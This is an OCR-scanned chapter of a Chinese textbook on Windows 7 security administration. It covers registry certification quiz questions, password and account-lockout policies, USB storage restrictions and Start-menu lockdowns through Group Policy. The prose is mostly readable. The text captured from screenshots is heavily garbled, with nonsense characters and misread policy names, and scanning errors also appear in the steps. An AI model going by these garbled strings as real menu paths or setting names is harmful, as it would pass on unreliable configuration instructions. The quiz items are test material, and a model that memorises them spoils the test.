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Services\ NetBT\ Parameters 子 键 ,添加 一 个 键 值 ,命名 为 SMBDeviceEnabled, 类 型 为 
REG_DWORD, 值 为 0, 修改 完毕 重启 计算 机 即 可 生效 。 





10.6 认证 试题 


一 、 选 择 题 

1. 车 在 Windows “运行 ”窗口 中 输入 ( ) 命 令 , 可 以 查看 和 修改 注册 表 。 
A. cmd B. mmc C. autoexe D. regedit 

2. Windows Server 2012 的 注册 表 根 键 ( ) 用 于 确定 不 同类 型 的 文件 。 
A. HKEY_CLASSES_ROOT B. HKEY_USER 
C.HKEY_LOCAL_MACHINE D. HEKEY_SYSTEM 

3. 有 些 病 毒 为 了 在 计算 机 启动 的 时 候 自动 加 载 ,可 能 会 更 改 注册 表 的 ( ) 子 键 下 

的 键 值 。 


A. HKEY _ CURRENT _ USER \ SOFTWARE \ Microsoft \ Windows \ 
CurrentVersion\Run 

B. HKEY _ CURRENT _ USER \ SOFTWARE \ Microsoft \ Windows \ 
CurrentVersion\RunOnce 

C. HKEY _ CURRENT _ USER \ SOFTWARE \ Microsoft \ Windows \ 
CurrentVersion\RunServices 

D. HKEY _ CURRENT _ USER \ SOFTWARE \ Microsoft \ Windows \ 


CurrentVersion\ Winlogon 
二 、 操作 题 
如 何 备份 和 还 原 注册 表 ? 


11.1 用 户 需 求 与 分 析 


所 谓 组 策略 就 是 基于 组 的 策略 。 它 以 Windows 中 的 一 个 MMC 管理 单元 的 形式 存 
在 ,可 以 帮助 系统 管理 员 针 对 整个 计算 机 或 是 特定 用 户 来 设置 多 种 配置 ,包括 桌面 配置 和 
安全 配置 。 通 过 使 用 组 策略 ,用 户 可 以 设置 各 种 软件 .计算 机 和 用 户 策略 。 


11.2 预备 知识 


寻 21 组 策略 的 作用 


组 策略 是 系统 管理 员 为 计算 机 和 用 户 定义 的 ,用 来 控制 应 用 程序 ,系统 设置 和 管理 模 
板 的 一 种 机 制 。 如 同一 个 庞大 的 数据 库 , 它 保存 着 Windows 系统 中 与 系统 、 应 用 软件 配 
置 相关 的 信息 。 随 着 Windows 功能 越 来 越 丰富 以 及 用 户 安装 在 计算 机 中 的 软件 程序 越 
来 越 多 ,注册 表 中 的 相关 信息 便 越 来 越 多 。 

组 策略 是 修改 注册 表 中 的 配置 的 一 个 有 效 工 具 。 它 使 用 更 加 完善 的 管理 组 织 方 
法 ,可 以 对 各 种 对 象 中 的 配置 进行 管理 和 设置 , 远 比 手动 修改 注册 表 更 加 方便 、 灵 活 ， 
功能 也 更 加 强大 。 在 注册 表 中 ,很 多 信息 都 是 可 以 由 用 户 自 定义 设置 的 ,但 这 些 信息 
发 布 在 注册 表 的 各 个 角落 ,如 果 是 手动 配置 , 便 会 非常 困难 和 繁杂 。 而 组 策略 则 将 系 
统 重要 的 配置 功能 汇集 成 各 种 配置 模块 , 供 管理 人 员 直 接 使 用 ,从 而 达到 方便 管理 计 
算 机 的 目的 。 

利用 组 策略 可 以 修改 Windows 的 桌面 “开始 ”菜单 登录 方式 组件、 网 络 及 IE 浏览 
器 等 许多 设置 。 通 常情 况 下 , 像 一 些 常用 的 系统 、 外 观 及 网 络 设置 等 ,用 户 可 以 在 控制 面 
板 中 进行 修改 ,但 往往 用 户 对 此 并 不 满意 ,因为 通过 控制 面板 能 修改 的 设置 太 少 ,水 平 高 
一 点 的 用 户 可 以 使 用 修改 注册 表 的 方法 来 设置 ,但 是 注册 表 中 涉及 的 内 容 又 太 多 ,修改 起 
来 也 不 方便 。 组 策略 正好 介 于 两 者 之 间 ,涉及 的 内 容 比 控制 面板 多 ,安全 性 和 控制 面板 一 
样 高 ,而 条 理性 可 操作 性 又 比 注册 表 强 ,因此 成 为 网 络 管理 员 管理 系统 的 首选 。 
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组 策略 的 打开 方式 有 两 种 。 一 种 是 使 用 命令 行 。 在 Windows 7 中 , 按 Win 十 R 组 合 
键 ,弹出 “运行 "窗口 ,输入 gpedit. msc 命令 并 按 Enter 键 ,打开 “组 策略 ”窗口 。 在 该 窗口 
的 左边 窗 格 中 ,用 户 可 以 看 到 两 个 选项 , 即 “ 计 算 机 配置 "和 “用 户 配 置 "。 另 一 种 是 利用 
MMC 控制 台 。MMC(Microsoft Management Console) 是 Windows 中 一 个 很 重要 的 系 
统管 理工 具 , 而 组 策略 实际 上 就 是 一 个 已 经 预 置 在 Windows 中 的 MMC, 因 此 用 户 可 以 
将 其 作为 独立 的 MMC 来 打开 。 打 开 “ 开 始 "菜单 ,在 “搜索 ”文本 框 中 输入 mmc 命令 并 按 
Enter 键 ,打开 “控制 台 ” 窗 口 , 即 Microsoft 管理 控制 台 。 在 该 窗口 中 选择 “文件 ”一 “ 添 
加 /删除 管理 单元 ”命令 。 在 打开 的 “添加 /删除 管理 单元 "对话 框 中 滑动 左 侧 窗口 滑 块 , 选 
择 “ 组 策略 对 象 编辑 器 ”选项 。 单 击 “ 添 加 ”按钮 ,弹出 “选择 组 策略 对 象 ” 对 话 框 ,默认 情况 
下 ,该 组 策略 对 象 为 本 地 计算 机 。 如 果 用 户 想 为 其 他 计算 机 设置 组 策略 ,可 以 单 击 “ 浏 览 ” 
按钮 ,在 打开 的 “浏览 组 策略 对 象 ” 对 话 框 中 选择 相应 的 计算 机 。 这 里 保持 系统 默认 设置 ， 
即 “ 本 地 计算 机 ”。 选 中 “从 命令 行 启动 时 ,允许 更 改组 策略 管理 单元 的 焦点 。 这 只 在 保存 
控制 台 的 情况 下 适用 ” 复 选 框 , 单 击 “ 完 成 ”按钮 ,如 图 11-1 所 示 。 返 回 * 添 加 独立 管理 单 
元 ”对 话 框 ,用 户 可 以 发 现 相应 的 “本 地 计算 机 策略 ”选项 被 添加 在 相应 的 列表 框 中 如 
图 11-2 所 示 。 单 击 “ 确 定 ” 按 钮 ,返回 “控制 台 1” 对 话 框 ,此 时 可 以 发 现 打 开 了 相应 的 组 
策略 管理 单元 ,如 图 11-3 所 示 。 

注意 : 如 果 因 为 误 操作 导致 无 法 通过 第 一 种 方法 进入 组 策略 窗口 ,可 以 在 计算 机 重 
启 的 时 候 按 住 F8 键 ,选择 “ 带 命 令 行 的 安全 模式 ”, 然 后 在 命令 行 窗口 输入 mme 命令 进 
入 控制 台 , 用 户 可 以 对 其 中 的 内 容 进 行 更 改 。 








11-1 “选择 组 策略 对 象 ” 对 话 框 





示 加 或 删除 管理 单元 


Wierosoft - 
Merosoft 
Werosoft .. 
有 erosoft - 
有 crosoft 
erosoft ... 
Mierosoft .. 
有 erosoft 
erosoft 

有 erosoft 
量 erosoft 

有 erosoft .. 








图 11-3 “控制 台 1 "窗口 


11.3 方案 设计 


方案 设计 如 表 11-1 所 示 。 
表 11-1 方案 设计 
任务 名 称 组 策略 的 设置 





1. 组 策略 的 开机 策略 

(1) 设置 密码 策略 

(2) 设置 账户 锁定 策略 

2. 移动 存储 设备 安全 策略 
(1) 禁止 数据 写 人 口 盘 
(2) 完全 禁止 使 用 盘 
(3) 禁用 移动 设备 执行 权限 
(4) 禁止 安装 移动 设备 


任务 分 解 
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续 表 








3. 组 策略 的 安全 设置 

(1) 隐藏 桌面 上 的 “网 络 位 置 "图 标 
(2) 任务 栏 和 “开始 ”菜单 设置 

(3) 正 设置 

(4) Windows 高 级 功能 设置 

任务 分 解 4. 系统 的 安全 管理 

(1) 禁止 在 登录 前 关机 

(2) 不 显示 最 后 登录 的 用 户 名 

(3) 记录 上 次 登录 系统 的 时 间 

(4) 禁止 修改 系统 还 原配 置 

(5) 在 Windows 7 中 实现 远程 关机 


1. 能 设置 密码 策略 

2. 能 设置 账户 锁定 策略 
3. 能 禁止 数据 写 人 U 盘 
4. 能 完全 禁止 使 用 U 盘 
5. 能 禁止 安装 移动 设备 
6 
8 
9 





. 能 禁止 移动 设备 执行 权限 
. 能 隐藏 桌面 上 的 “网 络 位 置 ”图 标 
.能 设置 满足 需要 的 任务 栏 和 “开始 ”菜单 
.能 禁止 关机 和 重新 启动 等 操作 
10. 能 禁用 网 页 的 “新 建 “ 在 新 窗口 中 打开 ”等 功能 
11. 能 禁止 对 IE 进行 “Internet 选项 ”设置 
12. 能 禁止 修改 下 浏览 器 的 主页 
13. 能 实现 远程 关机 
14. 能 隐藏 “我 的 电脑 ”中 指定 的 驱动 器 
15. 能 防止 从 “我 的 电脑 ”访问 驱动 器 
16. 能 禁止 设置 文件 夹 选项 
17. 能 禁止 光盘 自动 播放 
18. 能 防止 访问 控制 面板 ,或 禁用 “添加 /删除 程序 ” 
19. 能 禁止 使 用 命令 提示 符 
20. 能 禁止 使 用 注册 表 编辑 器 
21. 能 限制 使 用 应 用 程序 
22. 能 禁止 在 登录 前 关机 
23. 能 不 显示 上 次 登录 的 用 户 名 
24. 能 禁止 修改 系统 还 原配 置 
1. 熟悉 组 策略 的 作用 
2. 掌握 组 策略 的 打开 方式 
1. 树立 较 强 的 安全 ,节约 、 环 保 意识 
2. 具有 可 持续 发 展 能 力 
3 
4 
5 


能 力 目 标 





知识 目标 





素质 目标 . 培养 良好 的 职业 道德 
. 掌握 网 络 安全 行业 的 基本 情况 


. 培养 职业 兴趣 ,能 爱 岗 敬业 、 热 情 主动 的 工作 态度 
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11.4 项 目 实施 


似 41 任务 1: 组 策略 的 开机 策略 


1. 任务 目标 
用 户 可 以 使 用 组 策略 来 对 开机 进行 设置 ,以 使 自己 的 计算 机 和 隐私 更 加 安全 可 靠 。 


2. 工作 任务 


(1) 设置 密码 策略 。 
(2) 设置 账户 锁定 策略 。 


3. 工作 环境 

一 台 预 装 Windows 7 系统 的 主机 。 

4. 实施 过 程 

(1) 设置 密码 策略 。 密 码 是 用 户 登 录 到 系统 的 凭证 ,网 络 中 存在 一 些 别有用心 的 人 


总 是 想 尽 方法 以 各 种 手段 来 破解 用 户 密码 以 达到 不 可 告 人 的 目的 ,密码 起 着 比 用 户 账号 
更 加 重要 的 作用 。 

中 在 Windows 7 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 "对 话 框 ,执行 gpedit. msc 命令 
打开 “组 策略 ”窗口 。 在 该 窗口 中 展开 “计算 机 配置 ">“Windows 设置 "一 “安全 设置 ”一 
“账户 策略 ”>“ 密 码 策略 "节点, 用户 可 以 在 右边 窗 格 看 到 6 个 账户 锁定 策略 选项 ,分 别 是 
“密码 必须 符合 复杂 性 要 求 “ 密 码 长 度 最 小 值 “ 密 码 最 短 使 用 期 限 “ 密 码 最 长 使 用 期 限 ” 
“强制 密码 历史 ”和 “用 可 还 原 的 加 密 来 储存 密码 ”, 如 图 11-4 所 示 。 


GESTEIETE 

















图 11-4 “密码 策略 ”设置 


@ 用 户 可 以 双击 相应 的 密码 策略 选项 ,打开 相应 的 属性 对 话 框 ,然后 用 户 就 可 以 设 
置 属性 值 了 。 例 如 ,双击 “密码 长 度 最 小 值 密 码 策略 选项 设置 数值 ,如 图 11-5 所 示 。 
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密码 长 度 最 小 值 属性 








图 11-5 “密码 长 度 最 小 值 属性 ”对 话 框 


表 11-2 中 列 出 了 有 关 这 6 个 密码 策略 选项 的 说 明 。 
表 11-2 密码 策略 选项 说 明 




















密码 策略 说 明 

启用 该 策略 ,密码 必须 满足 : 
(1) 不 包含 全 部 或 部 分 的 账户 名 

a tea (2) 长 度 至 少 为 6 个 字符 
(3) 包含 英文 大 写字 母 .小写 字母, 基本 数字 和 非 字母 字符 中 的 3 类 
(4) 更 改 或 创建 密码 时 ,会 强制 执行 复杂 需求 

密码 长 度 最 小 值 1 一 14。 若 设置 为 0, 则 为 不 需要 密码 

密码 最 长 使 用 期 限 1~999。 若 设置 为 0, 表示 密码 永 不 过 期 

密码 最 短 使 用 期 限 1~999。 若 设置 为 0, 表示 人 允许 立即 更 改 密码 

强制 密码 历史 0 一 24。 确 保 旧 密码 不 能 继续 使 用 

ee 除非 应 用 程序 有 比 保护 密码 信息 更 重要 的 要 求 , 否 则 不 必 启 用 该 策略 





(2) 设置 账户 锁定 策略 。 默 认 情 况 下 ,用户 在 登录 界面 可 以 多 次 输入 无 效用 户 账号 
和 密码 ,而 这 些 也 为 使 用 字典 攻击 的 网 络 攻击 者 提供 了 快速 破解 用 户 账号 和 密码 的 机 会 ， 
从 而 给 用 户 的 权益 带 来 损害 。 为 了 解决 这 一 问题 ,用 户 可 以 使 用 组 策略 设置 账户 锁定 策 
略 ,以 将 非法 用 户 阻 挡 在 系统 之 外 。 系 统 的 Administrator 账户 即 超级 管理 员 账 户 不 会 因 
为 账户 锁定 策略 的 设置 而 被 锁定 。 设 置 账号 锁定 策略 的 具体 操作 步骤 如 下 。 

四 在 Windows 7 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 "对 话 框 ,执行 gpedit. msc 命令 
打开 “组 策略 ”窗口 。 
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@ 在 该 窗口 中 展开 “计算 机 配置 ">“Windows 设置 "安全 设置 "一 “账户 策略 ”一 
“账户 锁定 策略 "节点, 用户 可 以 在 右边 窗 格 看 到 3 个 账户 锁定 策略 选项 ,分 别 是 “账户 锁 
定时 间 交 账户 锁定 阔 值 ”和 * 重 置 账户 锁定 计数 器 ”, 如 图 11-6 所 示 。 





图 11-6 “账户 锁定 策略 "设置 


@ 双击 “账户 锁定 阔 值 ?选项 ,打开 “账户 锁定 阔 值 属性 ?对 话 框 。 默 认 情 况 下 ,账户 
为 不 锁定 状态 ,用 户 可 以 根据 自己 的 实际 情况 进行 设置 (下 限 为 0, 代表 账户 不 设置 锁定 
状态 ,上 限 为 999 次 , 即 经 过 999 次 无 效 输入 以 后 ,账户 被 设置 为 锁定 状态 ) 。 

@ 例如 设置 成 3 次 ,然后 单 击 “ 应 用 ”按钮 ,弹出 “建议 的 数值 改动 ”对 话 框 。 当 单 击 
“确定 ”按钮 后 ,其 他 两 个 策略 选项 的 数值 会 自动 被 设置 为 被 建议 的 数值 ,如 图 11-7 所 示 。 


建议 的 数值 改动 


国 幅 


户 锁定 时 间 
国 重 喃 帐户 玺 定 计数 器 





图 11-7 “建议 的 数值 改动 ”对 话 框 


如 果 用 户 不 慎 忘 记 了 登录 的 用 户 名 和 密码 ,可 以 在 进入 登录 界面 时 ,同时 按 Ctrl 十 
Alt 十 Delete 组 合 键 使 用 Administrator 账户 来 登录 系统 。 


伺 42 任务 2: 移动 存储 设备 安全 策略 
1. 任务 目标 


移动 设备 是 病毒 .木马 传播 的 主要 途径 之 一 。 另 外 ,由 于 移动 设备 的 便携 性 ,也 给 非 
法 用 户 窃取 计算 机 中 的 重要 资料 提供 了 很 大 的 方便 。 因 此 ,如 果 计 算 机 中 存 有 重要 资料 ， 
而 且 是 多 人 使 用 ,那么 就 有 必要 对 移动 存储 设备 的 使 用 加 以 限制 。 
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2. 工作 任务 


(1) 禁止 数据 写 人 器 盘 。 
(2) 完全 禁止 使 用 U 盘 。 
(3) 禁用 移动 设备 执行 权限 。 
(4) 禁止 安装 移动 设备 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 禁止 数据 写 人 U 盘 。 如 果 不 打算 完全 禁用 USB 设备 ,希望 读 取 U 盘 的 内 容 , 只 
是 禁止 数据 写 人 U 盘 。 可 以 通过 如 下 方法 来 实现 。 
Q@ 打开 “本 地 组 策略 编辑 器 "窗口 ,在 左 侧 窗 格 中 展开 “计算 机 配置 "管理 模板 "一 
“系统 ”>“ 可 移动 存储 访问 "节点 ,在 右 侧 窗 格 中 双击 “可 移动 磁盘 ; 拒绝 写 入 权限 "策略 ， 
如 图 11-8 所 示 。 
EEZTEETETTE 
文件 中 ”操作 查看 帮助 0 


和 中 | 为 加 | 本 | 加 辑录 
局 本 地 计算 机 策略 










































日 天 计算 机 配置 1 
可 移动 磁盘 : 拒绝 瑟 入 权限 
时 Nin 强制 重新 启动 的 时 间 (种 为 单位 ) 
日 国 祝贺 板 4 和 DMD 拒绝 亿 行 权限 


国 Yindows 组 件 


玫 Windows Vista 

eseememuans\ 
Rd 
WA 


系统 
国 Internet 通信 管理 
国 iscsT 

国 Kerberos 

国 Windows 热 启动 
田园 Windows 时 间 服 务 







拒绝 
a 撕 时 也有 可 了 
有 可 移动 存储 : 允许 在 远程 会 话 中 直接 访问 
磁带 驱动 器 : 拒绝 执行 权限 
带 驱 动 器 : 拒绝 读 取 权限 
磁带 驱动 器 : 拒绝 写 入 权限 
D 设备 : 拒 绾 读 取 权限 


i ep 








D 设备 : 拒绝 写 入 权限 
= 加 
上 扩 民 人 生生 站 
则 个 全 本 | | 
图 11-8 “拒绝 写 入 权限 ”设置 
@ 在 打开 的 “可 移动 磁盘 : 拒绝 写 人 权限 ”窗口 中 选择 “已 启用 ” 单 选 按钮 , 单 击 “ 确 
定 ?按钮 。 


注意 : 如 果 要 禁止 读 取 如 盘 ,而 允许 写 入 数据 , 则 可 以 启用 “可 移动 磁盘 : 拒绝 读 取 
权限 ”策略 来 实现 。 
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(2) 完全 禁止 使 用 U 盘 。U 盘 因 其 便携 性 而 普及 ,这 也 给 用 户 的 计算 机 的 数据 安全 
造成 了 威胁 ,因为 使 用 U 盘 复 制 计算 机 中 的 资料 非常 容易 ,如 果 计 算 机 是 公用 的 ,而 且 存 
有 重要 资料 ,必须 小 心 使 用 。 最 好 的 方法 是 让 系统 禁用 U 盘 , 操 作 方法 如 下 。 

QO@ 打开 “本 地 组 策略 编辑 器 "窗口 ,在 左 侧 窗 格 中 展开 “计算 机 配置 ”>“ 管 理 模 板 ” 一 
“系统 ”>“ 可 移动 存储 访问 ”节点 ,在 右 侧 窗 格 中 双击 “所 有 可 移动 存储 类 : 拒绝 所 有 权 
限 ” 策 略 ,如 图 11-9 所 示 。 





文件 四) 操作 以 ) E 帮助 00 
各 中 | 方 [ 丰 | 3| 旧 本 | 本 














加 i A 
国 口 和 Im 
国 串 和 ID Heh 
国 C 和 Dyn; 拒绝 写 入 权限 
国 自 定义 类 : 拒绝 读 取 权限 
国 自 定义 类 : 拒绝 写 入 权限 
固 软盘 3 动 器 - 拒绝 执行 权限 
固 软盘 驱动 器 :拒绝 读 取 权限 
固 软盘 驱动 器 : 拒绝 写 入 权限 
arberos 。 i 四 可 移动 磋 盘 ; 拒绝 执行 权限 
国 Windors 热 启动 下 . 国 可 移动 大 盘 ， 拒 绝 读 取 权限 
田园 Windors 时 间 服务 固 可 移动 详 盘 拒绝 瑟 入 权限 
国 Yinaows 文件 保护 i 
固 所 有 可 移动 存储 nr 
磁带 驱动 器 :拒绝 执行 权限 
磁带 驱动 器， 拒绝 读 取 权限 
国 磁带 9E 动 器 : 拒绝 写 入 权限 
固 YPD 设备 : 拒绝 读 取 权限 
国 YPD 设备 : 拒绝 写 入 权限 





图 11-9 “拒绝 所 有 权限 ”设置 


@ 在 打开 的 “所 有 可 移动 存储 类 : 拒绝 所 有 权限 "窗口 中 选择 “已 启用 ” 单 选 按 钮 , 单 
击 “ 确 定 ” 按 钮 。 

(3) 禁用 移动 设备 执行 权限 。 如 果 不 希 望 他 人 在 自己 的 计算 机 上 随便 使 用 移动 设 
备 , 则 可 以 通过 组 策略 禁止 安装 可 移动 设备 ,具体 操作 方法 如 下 。 

@ 打开 “本 地 组 策略 编辑 器 ”窗口 ,在 左 侧 窗 格 中 展开 “计算 机 配置 ">“ 管 理 模 板 ” 一 
“系统 ”~ 可 移动 存储 访问 ”节点 ,在 右 侧 窗 格 中 双击 “可 移动 磁盘 : 拒绝 执行 权限 ”策略 ， 
如 图 11-10 所 示 。 

@ 在 打开 的 “可 移动 磁盘 : 拒绝 执行 权限 ”窗口 中 选择 “已 启用 ” 单 选 按钮 , 单 击 “ 确 
定 ” 按 钮 。 

启用 此 策略 后 ,可 移动 设备 上 的 可 执行 文件 将 不 能 执行 ,计算 机 也 就 不 会 再 被 病毒 感 
染 , 而 如 果 需 要 执行 ,只 需要 复制 到 硬盘 中 即 可 。 

(4) 禁止 安装 移动 设备 。 如 果 不 希 望 他 人 在 自己 的 计算 机 上 随便 使 用 移动 设备 , 则 
可 以 通过 组 策略 禁止 安装 可 移动 设备 ,具体 操作 方法 如 下 。 

O@ 打开 “本 地 组 策略 编辑 器 ”窗口 ,在 左 侧 窗 格 中 展开 “计算 机 配置 ”>“ 管 理 模 板 ” 一 
“系统 ”>“ 设 备 安装 ”>“ 设 备 安装 限制 "节点 ,在 右 侧 窗 格 中 双击 “禁止 安装 可 移动 设备 ” 
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文件 F) 操作 届 查看 W 帮助 00 
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可 移动 磁盘 : 拒绝 执行 权限 
回国 软件 设置 和 | 重新 店 a 的 时 间 (以 各 为 单位 ) 
田 国 iniovs 设置 编辑 秆 最 设置 
日 国 管理 模板 






回转 Windors 组 件 






i rindors Server 
2008 到 


ees 
日 国 Ihternet 通信 管理 






i 时 设置 ， 将 拒绝 对 此 可 
si a 
国 Yindovs 热 启动 





a” 


田 国 Yindows 时 间 服 务 
国 Yindors 文件 保护 










带动 器 : 拒绝 写 入 权限 
PD 设备: 拒 络 读 取 权限 
PD 设备 : 拒绝 写 入 权限 








图 11-10 “拒绝 执行 权限 ”设置 
策略 ,如 图 11-11 所 示 。 





蛋 本 地 组 策略 编辑 中 
文件 2) 操作 以) 查看 W) 帮助 00 











和 啤 | 改 | 加 | 了 | 加 加 | 时 
局 本 地 计算 机 第 略 
日 中 计算 机 配置 











禁止 安装 可 移动 设备 
编辑 第 枚 设置 


性 Windows Vista 


固 允许 管理 员 忽 略 设 备 安装 限制 第 略 

国 允许 使 用 与 下 列 设备 安装 程 序 类 相 罗 本 639B 动 程 有 
阻止 使 用 与 下 列 设备 安装 程序 类 相 匹 本 由 9E 动 程 有 
当 第 辐 设 置 禁止 安装 时 显示 自 定义 信息 

当 第 四 设 置 禁 止 设备 安装 时 暗示 自 定义 信息 标题 
允许 安装 与 下 列 设备 ID 相 匹配 的 设备 

阻止 安装 与 下 列 任何 设备 ID 相 下 本 和 设备 

固 在 策 辐 更 改 需要 重新 启动 才能 生效 时 ， 等 待 强制 


禁止 安装 可 移动 设备 
国 禁止 安装 未 由 其 他 第 辐 设 置 扬 述 的 设备 











国 iscsT 
国 Kerberos 

国 Windors 热 启动 
国 Windows 时 间 服 务 
国 Yindows 文件 保护 
国 训 蝶 本 额 
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图 11-11 “禁止 安装 可 移动 设备 ”设置 
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@ 在 打开 的 “禁止 安装 可 移动 设备 ”窗口 中 选择 “已 启用 ” 单 选 按钮 , 单 击 “ 确 定 ” 
按钮 。 

启用 此 策略 后 ,系统 就 不 会 安装 可 移动 设备 ,而 且 无 法 更 新 现 有 可 移动 设备 的 驱动 
程序 。 

注意 : 此 策略 比 允 许 安装 设备 的 任何 其 他 策略 的 优先 级 都 高 。 


寻 43 任务 3: 组 策略 的 安全 设置 





1. 任务 目标 
用 户 可 以 使 用 组 策略 来 对 系统 进行 设置 ,以 使 自己 的 计算 机 和 隐私 更 加 安全 可 靠 。 
2. 工作 任务 


(1) 隐藏 桌面 上 的 “网 络 位 置 ”图 标 。 
(2) 任务 栏 和 “开始 "菜单 设置 。 

(3) IE 设置。 

(4) Windows 高 级 功能 设置 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


(1) 隐藏 桌面 上 的 “网 络 位 置 ? 图 标 。Windows 的 桌面 就 像 人 们 的 办 公 桌 一 样 ,需要 
经 常 进行 整理 和 清洁 ,而 组 策略 就 如 同人 们 的 贴身 秘书 ,让 桌面 管理 工作 变 得 易如反掌 。 

位 置 : 本 地 组 策略 编辑 器 一 用 户 配 置 一 管理 模板 一 桌面 。 

要 隐藏 桌面 上 的 “网 络 位 置 " 图 标 ,只 要 在 右 侧 窗 格 中 将 “在 桌面 上 隐藏 “网 络 位 置 " 图 
标 ” 的 策略 启用 即 可 ,如 图 11-12 所 示 。 

(2) 任务 栏 和 “开始 ”菜单 设置 。 位置 : 本 地 计算 机 策略 一 用 户 配置 一 管理 模板 一 
“开始 ”菜单 和 任务 栏 。 

Q@ “开始” 菜单 设置 。 如 果 觉 得 Windows 的 “开始 ”菜单 项 太 多 ,可 以 将 不 需要 的 菜 
单项 从 “开始 ”菜单 中 删除 。 例 如 ,从 “开始 ”菜单 中 删除 “帮助 ”菜单 ,启动 相应 策略 即 可 ， 
如 图 11-13 所 示 。 

在 组 策略 右 侧 窗 格 中 ,提供 了 “从 [开始 | 菜单 中 删除 “所 有 程序 列表 ”策略 ,如 
图 11-14 所 示 , 只 要 将 不 需要 的 菜单 项 所 对 应 的 策略 启用 即 可 。 同 样 ,可 以 设置 “从 [ 开 
始 | 菜 单 中 删除 “文档 ;图标 “从 [开始 | 菜单 中 删除 “音乐 图标” 和 “从 [开始 | 菜单 中 删除 
图片? 图标 等 多 种 组 策略 配置 项 目 。 

@ 阻止 更 改 任务 栏 和 “开始 ”菜单 属性 设置 。 如 果 不 想 随 意 让 他 人 更 改 * 任 务 栏 ” 和 
“开始 ”菜单 的 设置 .只 要 将 本 地 计算 机 策略 右 侧 窗 格 中 的 “阻止 更 改 “ 任 务 栏 和 | 开始 | 菜 
单 " 设 置 ?策略 启用 即 可 .如 图 11-15 所 示 。 
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FESEELETE 

















局 本 地 计算 机 策略 
日 嘻 计算 机 配置 





















田 国 软件 设置 在 汪 丙 上册 六 " 奖 岳 丛生 ” 国 村 i el 
加 号 i 编 扣 第 临 设 轩 tive Directory 
村 要 禁止 用 户 手动 重 定向 本 轩 文 件 文件 夫 未 村 
昌国 软件 设置 全 2 Windows 2000 隐 苞 和 禁用 桌面 上 的 所 有 项 目 未 配置 
国 Winaors 设置 . 杀青 温 点 面向 叶 未 配置 
日 国 管理 模板 et 四 隐 基 训 面 上 的 Internet Explorer 图 标 不 配置 
人 国 “开始 "菜单 和 任务 栏 | jb 。 了 4 面 上 的 “ 计 其 机 ”国标 未 配置 
国 共享 文件 夫 计 得 仙 * 
田 国 控制 画板 法 总 在 出 srosoft Windors Vista 其 机 ”图标 上 下 文 光 单 中 思绪 “属性 
田 国 网 络 者 才 统 中 ， 此 第 申 详 用 于 从 "文档 "图标 上 下 文 菜单 中 量 除 ”属性 ” 未 本 置 
回国 系统 时 要 稳 最 近 打 开 的 文档 的 共享 添加 | “网络 位 器 ” 未 了 置 
日 国 让 面 3 从 点 机 和 回收 沾 未 隐 置 
豫 所 有 设置 有“ 回 权 站 ”上 下 文 东单 的 “属性 " 未 醒 轩 
退出 8 不 保存 设 加 未 配置 
关闭 Are Shake 窗口 最 小 化 恨 标 手 扫 未 限 轩 
上 添加 、 撞 、 放 和 关闭 任务 栏 的 工具 栏 未 村 加 
用 调整 让 而 工具 栏 未 于 加 
| 天 











图 11-12 ”在 桌面 上 隐藏 “网 络 位 置 "图 标 


文件 中， 操作 内 查看 0 部 助 o0 

ESIETTDIETE 

a 

的 软 人 和 [ds RCIE 
田 国 Windovs 设置 退出 3 彰 入 最 近 打开 的 文档 的 历史 

Re 4 为 用 户 如 jE 程序 列表 





























十 来 注 稍 ”添加 到 开始 1 荣 音 未 醒 置 
导 一 Pada 事 vinos xm 灰 显 不 可 用 的 indows Installer 程序 [开始 」 菏 单 快捷 未 配置 
入 关闭 个 性 化 东单 未 配置 
° ® Ti Pm 东单 中 要 “ 导 助 " 命 。 | 久 定 任务 未 于 
回国 Windors 组 件 国 将 "在 单 抽 的 内 存 空间 运行 " 复 选 框 水 加 别 “ 运 行 ” 对话 村 未 醒 轩 
国 共享 文件 天 后 提 时 到 区 固 关 半 郁 知 区 域 下 理 未 本 加 
田 国 控制 面板 站 了 贡 引 。 。 加 兄 亲 [开始 ) 某 单 顺 目 上 的 “气球 提示 ” 未 配置 
回国 网络 间架 “开始” 某 单 上 的 指 放 和 上 下 文 录音 未 醒 轩 
田 国 系统 国 赃 针 并 阻止 访问 "关机 ”、“ 重 新 启动 ”、“ 睡 眼 ” 和 “ 未 醒 置 
日 国 点 面 从 开始 1 菜单 公用 程序 组 未 要 加 
加 所 有 设置 从 开始 1 菜单 中 及 条 “收藏 夫 " 荣 单 未 醒 置 
从 开始 1 荣 单 中 浪打 “搜索 ”链接 未 醒 半 
从 开始 ) 菜单 中 及 和 常用 程序 列表 未 醒 轩 
从 开始 1 荣 单 中 螂 “游戏 ”链接 未 配置 
<| 上 攻 
扩 民 A 于 
本 


图 11-13 ”从 “开始 "菜单 中 删除 “帮助 ”菜单 


@ 禁止 关机 (Windows 7) 和 重新 启动 等 操作 。 计 算 机 启动 以 后 ,如 果 不 希 望 这 个 用 
户 再 进行 关机 和 重新 启动 操作 ,可 将 本 地 计算 机 策略 右 侧 窗 格 中 的 “删除 并 阻止 访问 ' 关 
机 ”重新 启动 “睡眠 ?和 “休眠 "命令 ?策略 启用 .如 图 11-16 所 示 。 

这 个 设置 会 从 “开始 ”菜单 中 删除 “关机 ”选项 ， diy 任务 管理 器 ”对 话 框 
( 按 Ctrl 十 Alt 十 Delete 组 合 键 会 出 现 这 个 对 话 框 ) 中 的 “关机 ?选项 。 但 是 ,此 设置 虽然 可 
防止 用 户 用 Windows 界面 来 关机 ,但 无 法 防止 用 户 用 其 他 第 A Windows 
关闭 。 
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文件 @) ”操作 人 ) 查看 WM) 帮助 00 
和 哆 | 为 加 | 攻 | 回 画 | 昂 


局 本 地 计算 机 第 路 
日 盖 计算 机 配置 































“开拍 ”菜单 和 任务 栏 





计 < 四 
国 次 科 设 和 入- 到! 于 中 歼 “ 所 有 各 3 让 村 
国 inaors 设置 和 和 汪 
编辑 迁 罗 设置 E re 
“在 单 和 内 存 空间 运行 ” 复 计 权 冰 加 到 “运行 "对 话 要 。。 ”未 于 轩 
要 通知 区 域 青 晶 未 本 
gs 或 国 罗 条 ' 开 始 ! 菜单 硕 目 上 的 “气球 提示 ” 未 醒 轩 
多 “ 开 始 ” 荣 单 上 的 拖 计 和 上 下 文 守 单 未 村 
并 阳 目 访问 “关机 ”、“ 重 新 启动 ”、“ 隆 眼 " 和 未 可 
